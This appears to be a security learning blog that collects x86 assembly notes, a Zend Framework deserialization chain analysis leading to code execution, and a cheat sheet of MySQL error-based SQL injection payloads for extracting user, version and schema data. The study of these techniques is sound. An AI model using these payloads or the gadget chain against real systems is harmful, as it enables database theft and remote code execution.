Reverse engineering

JCC instructions also only affect EIP. First, one point must be clear: every conditional jump instruction decides whether to jump based on the flag bits.

| Instruction | Full English name | Meaning | Flag condition |
|---|---|---|---|
| JE, JZ | jump equal, jump zero | jump if the result is zero (jump if equal) | ZF=1 |
| JNE, JNZ | jump not equal, jump not zero | jump if the result is not zero (jump if not equal) | ZF=0 |
| JS | jump sign | jump if the result is negative | SF=1 |
| JNS | jump not sign | jump if the result is non-negative | SF=0 |
| JP, JPE | jump parity, jump parity even | jump if the number of 1 bits in the result is even | PF=1 |
| JNP, JPO | jump not parity, jump parity odd | jump if the number of 1 bits in the result is odd | PF=0 |
| JO | jump overflow | jump if the result overflowed | OF=1 |
| JNO | jump not overflow | jump if the result did not overflow | OF=0 |
| JB, JNAE | jump below, jump not above equal | jump if below (unsigned) | CF=1 |
| JNB, JAE | jump not below, jump above equal | jump if above or equal (unsigned) | CF=0 |
| JBE, JNA | jump below equal, jump not above | jump if below or equal (unsigned) | CF=1 or ZF=1 |
| JNBE, JA | jump not below equal, jump above | jump if above (unsigned) | CF=0 and ZF=0 |
| JL, JNGE | jump less, jump not greater equal | jump if less (signed) | SF≠OF |
| JNL, JGE | jump not less, jump greater equal | jump if greater or equal (signed) | SF=OF |
| JLE, JNG | jump less equal, jump not greater | jump if less or equal (signed) | ZF=1 or SF≠OF |
| JNLE, JG | jump not less equal, jump greater | jump if greater (signed) | ZF=0 and SF=OF |

The difference between signed and unsigned comparisons:

    CMP AL, CL
    JG  0x12345678
    JA  0x12345678
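As an added example (not part of the original notes), the following C program models the flag bits an 8-bit CMP AL, CL leaves behind and evaluates the predicates from the table above, showing why JA and JG can disagree on the same operands; the struct and function names are my own.

```c
/* Added example: emulate the flags set by CMP AL, CL and the JCC predicates. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

typedef struct { bool cf, zf, sf, of, pf; } flags_t;

/* PF is set when the low byte of the result has an even number of 1 bits. */
static bool parity_even(uint8_t v) {
    int ones = 0;
    for (; v; v >>= 1) ones += v & 1;
    return (ones & 1) == 0;
}

/* CMP computes al - cl and only updates the flags (SUB without a write-back). */
static flags_t cmp8(uint8_t al, uint8_t cl) {
    uint8_t res = (uint8_t)(al - cl);
    flags_t f;
    f.cf = al < cl;                                    /* unsigned borrow          */
    f.zf = res == 0;
    f.sf = (res & 0x80) != 0;                          /* sign bit of the result   */
    f.of = (((al ^ cl) & (al ^ res)) & 0x80) != 0;     /* signed overflow          */
    f.pf = parity_even(res);
    return f;
}

/* Predicates exactly as listed in the table above. */
static bool jump_ja(flags_t f)  { return !f.cf && !f.zf; }        /* above (unsigned)   */
static bool jump_jae(flags_t f) { return !f.cf; }                 /* above/equal        */
static bool jump_jb(flags_t f)  { return f.cf; }                  /* below (unsigned)   */
static bool jump_jg(flags_t f)  { return !f.zf && f.sf == f.of; } /* greater (signed)   */
static bool jump_jge(flags_t f) { return f.sf == f.of; }          /* greater/equal      */
static bool jump_jl(flags_t f)  { return f.sf != f.of; }          /* less (signed)      */

int main(void) {
    /* AL = 0x80 is 128 unsigned but -128 signed; CL = 0x01. */
    flags_t f = cmp8(0x80, 0x01);
    printf("CMP AL,CL (AL=0x80, CL=0x01): CF=%d ZF=%d SF=%d OF=%d PF=%d\n",
           f.cf, f.zf, f.sf, f.of, f.pf);
    printf("JA taken: %d   JG taken: %d\n", jump_ja(f), jump_jg(f));
    return 0;
}
```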

2021-6-20 1 0
2021-6-16 4 0
Reverse engineering

Notes from the Dishui (滴水) reverse engineering videos:

Symbol meanings:
r: register; m: memory; imm: immediate value
r8: 8-bit general-purpose register; m8: 8-bit memory; imm8: 8-bit immediate value

# MOV instruction
MOV destination operand, source operand
MOV r/m8, r8
MOV r/m16, r16
MOV r/m32, r32
MOV r8, r/m8
MOV r16, r/m16
MOV r32, r/m32
MOV r8, imm8
MOV r16, imm16
MOV r32, imm32
Function: copies the source operand to the destination operand.
The source operand can be an immediate value, a general-purpose register, a segment register, or a memory unit.
The destination operand can be a general-purpose register, a segment register, or a memory unit.
The operands must have the same width.
The source and destination operands cannot both be memory units.

# ADD instruction
ADD r/m8, imm8
ADD r/m16, imm16
ADD r/m32, imm32
ADD r/m16, imm8
ADD r/m32, imm8
ADD r/m8, r8
ADD r/m16, r16
ADD r/m32, r32
ADD r8, r/m8
ADD r16, r/m16
ADD r32, r/m32
    MOV eax, 1
    add eax, 2
eax ends up with the value 3.
ADD destination operand, source operand
Function: adds the source operand to the destination operand.

# SUB instruction
SUB syntax:
SUB r/m8, imm8
SUB r/m16, imm16
SUB r/m32, imm32
SUB r/m16, imm8
SUB r/m32, imm8
SUB r/m8, r8
SUB r/m16, r16
SUB r/m32, r32
SUB r8, r/m8
SUB r16, r/m16
SUB r32, r/m32
SUB destination operand, source operand
Function: subtracts the source operand from the destination operand.

# AND instruction
AND syntax:
AND r/m8, imm8
AND r/m16, imm16
AND r/m32, imm32
AND r/m16, imm8
AND r/m32, imm8
AND r/m8, r8
AND r/m16, r16
AND r/m32, r32
AND r8, r/m8
AND r16, r/m16
AND r32, r/m32
AND destination operand, source operand
Function: ANDs the source operand with the destination operand and stores the result in the destination operand.
    mov eax, 2
    and EAX, 3
2 in binary is 0010 and 3 in binary is 0011; 0010 and 0011 is 0010, so the value is 2.

# OR instruction
OR syntax:
OR r/m8, imm8
OR r/m16, imm16
OR r/m32, imm32
OR r/m16, imm8
OR r/m8, r8
OR r/m16, r16
OR r/m32, r32
OR r8, r/m8
OR r16, r/m16
OR r32, r/m32
OR destination operand, source operand
Function: ORs the source operand with the destination operand and stores the result in the destination operand.
    mov eax, 2
    OR EAX, 3
0010 | 0011 gives 3.

# XOR instruction
XOR syntax:
XOR r/m8, imm8
XOR r/m16, imm16
XOR r/m32, imm32
XOR r/m16, imm8
XOR r/m8, r8
XOR r/m32, r32
XOR r8, r/m8
XOR r16, r/m16
XOR r32, r/m32
XOR destination operand, source operand
Function: XORs the source operand with the destination operand and stores the result in the destination operand.
    mov eax, 2
    xor EAX, 3
0010 XOR 0011 gives 0001, so the value is 1.

# NOT instruction
NOT syntax:
NOT r/m8
NOT r/m16
NOT r/m32
NOT operand
Function: inverts every bit.
    mov eax, 2
    NOT EAX
2 in binary is 0010; inverted it is 1101, and 1101 is D.

2021-6-14 6 0
2021-6-7 12 0
2021-1-19 125 0
Application security

Zend Framework deserialization vulnerability: reproduction and analysis

1. Environment setup
Install composer and download the project:
    composer create-project zendframework/skeleton-application
Then enter the directory and start the server:
    php -S 0.0.0.0:8099 -t public
Modify module/Application/src/Controller/IndexController.php, generate the poc (poc.php) and send the request; the environment is now set up.

2. Vulnerability analysis: read the POC and analyze the chain following it.

1. Zend\Http\Response\Stream: the __destruct method calls unlink. The first parameter of unlink is of type String, so if $this->streamName is an object, its __toString method is triggered.
2. Zend\View\Helper\Gravatar: based on $a = new Zend\Http\Response\Stream($b);, analyze Zend\View\Helper\Gravatar. __toString calls the getImgTag method; following getImgTag leads to setSrcAttribForImg, where the attributes parameter is controllable; following htmlAttribs to $this->getView() shows that $view is controllable, i.e. we can control $this->getView().
3. Based on $b = new Zend\View\Helper\Gravatar($c);, $this->getView() is a new Zend\View\Renderer\PhpRenderer object. Following PhpRenderer: PhpRenderer has a plugin method; following getHelperPluginManager, $__helpers is also controllable, so $this->getHelperPluginManager() can be controlled.
4. $c = new Zend\View\Renderer\PhpRenderer($d);, and $b is Zend\Config\ReaderPluginManager. Following ReaderPluginManager: this class has no get method, but it extends AbstractPluginManager. Following the get method of AbstractPluginManager: the $name passed to has is escapehtml, $name is escapehtml, and $options is not controllable and can only be empty, so $instance takes its value from parent::get. Following parent::get: because
    $escaper = $this->getView()->plugin('escapehtml');
    $escapeHtmlAttr = $this->getView()->plugin('escapehtmlattr');
$this->services needs to contain 2 keys:
    $this->services = ["escapehtml" => $services, "escapehtmlattr" => $services];
Based on $d = new Zend\Config\ReaderPluginManager($e); and $e = new Zend\Validator\Callback();, $this->services needs to be Zend\Validator\Callback. Continuing into validate, $this->instanceOf is controllable and needs to be Zend\Validator\Callback(). $escaper is Zend\Validator\Callback(); when it is called with key 1, __invoke is called automatically, which then calls isValid. Following isValid: line 139 contains a call_user_func_array, $args is 1, and $callback = $this->getCallback(); following getCallback shows that $options is also controllable. This ultimately leads to RCE.

The complete chain is therefore:
1. unlink() in Zend\Http\Response\Stream->__destruct() triggers the Zend\View\Helper\Gravatar->__toString() method.
2. Zend\View\Helper\Gravatar->__toString() calls the Zend\View\Helper\Gravatar->getImgTag() method, which finally triggers the htmlAttribs method at AbstractHtmlElement.php:73.
    1. $this->getView()->plugin in htmlAttribs is PhpRenderer's plugin; $this->getView() is controllable, PhpRenderer->plugin calls getHelperPluginManager, and the __helpers of getHelperPluginManager is controllable.
    2. Controlling __helpers requires it to be Zend\Config\ReaderPluginManager. Zend\Config\ReaderPluginManager has no get method; ReaderPluginManager extends AbstractPluginManager, so AbstractPluginManager->get is called, which subsequently calls ServiceManager->get (AbstractPluginManager extends ServiceManager). services and instanceOf are controllable, so when serializing ReaderPluginManager it is only necessary to specify services and instanceOf. $escaper equals the instanceOf returned by AbstractPluginManager->get, i.e. Zend\Validator\Callback(); when $escaper($key) is called it triggers Zend\Validator\Callback->__invoke(), which finally executes the call_user_func_array in Zend\Validator\Callback->isValid().

pentest

1. floor()
floor used together with group by: relies on the uniqueness of group by keys and MySQL's encoding/execution order, so that a second evaluation produces a different key.
    select * from users where id=1 OR+1e0 GROUP BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2)) HAVING+MIN(0) OR+1
For numeric injection there is no need to close the ' ; inject through an or condition. The generic format for this injection:
    select * from users where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)

2. extractvalue
A function that queries XML documents; like updatexml(), it applies to versions 5.5 and later.
    select * from users where id=1 and extractvalue(1,concat(0x7e,user()))

3. updatexml()
    select * from test where id=1 and updatexml(1,concat(0x7e,user()),1)

4. geometrycollection()
    select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5. multipoint()
    select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6. polygon()
    select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7. multipolygon()
    select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8. linestring()
    select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

9. multilinestring()
    select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10. exp()
exp() is the base-e exponential function. With exp(709) as the limit, the function errors when the argument is greater than 709:
    ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
    select * from test where id=1 and exp(~(select * from(select user())a));

11. procedure analyse
    select * from users order by 1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

12. User variables
    select min(@a:=1) from information_schema.tables group by concat(database(),@a:=(@a+1)%2)

13. Via NAME_CONST (for low versions)
    +or+(select * from(select NAME_CONST(version(),1),NAME_CONST(version(),1))as x)

14. Bitwise NOT of 0 error (BIGINT overflow)
    select ~0+!(select * from(select user())x);

15. atan, ceil, floor, !, ... subtraction overflow
    select !atan((select * from(select user())a))-~0;
    select !ceil((select * from(select user())a))-~0;
    select !floor((select * from(select user())a))-~0;
    select !HEX((select * from(select user())a))-~0;
    select !RAND((select * from(select user())a))-~0;
    select !FLOOR((select * from(select user())a))-~0;
    select !CEILING((select * from(select user())a))-~0;
    select !RAND((select * from(select user())a))-~0;
    select !TAN((select * from(select user())a))-~0;
    select !SQRT((select * from(select user())a))-~0;
    select !ROUND((select * from(select user())a))-~0;
    select !SIGN((select * from(select user())a))-~0;

16. @:=
    !(select * from(select(concat(@:=0,(select count(*) from `information_schema`.columns where table_schema=database() and @:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0
    (select(!x-~0) from(select(concat(@:=0,(select count(*) from `information_schema`.columns where table_schema=database() and @:=concat(@,0xa,table_name,0x3a3a,column_name)),@))x)a)
    (select !x-~0. from(select(concat(@:=0,(select count(*) from `information_schema`.columns where table_schema=database() and @:=concat(@,0xa,table_name,0x3a3a,column_name)),@))x)a)

17. ^ bitwise XOR
    select !(select * from(select user())a)-0^222;

18. Bitwise NOT of 0 with table subtraction overflow
    (select(!x-~0) from(select(select user())x)a)
    (select !x-~0. from(select(select user())x)a)

19. in overflow
    select * from users where id in(~0+!(select * from(select user())x))

Keep in mind that the output displayed by all of these error functions is subject to a length limit.

2020-11-26 231 0
2020-11-16 234 0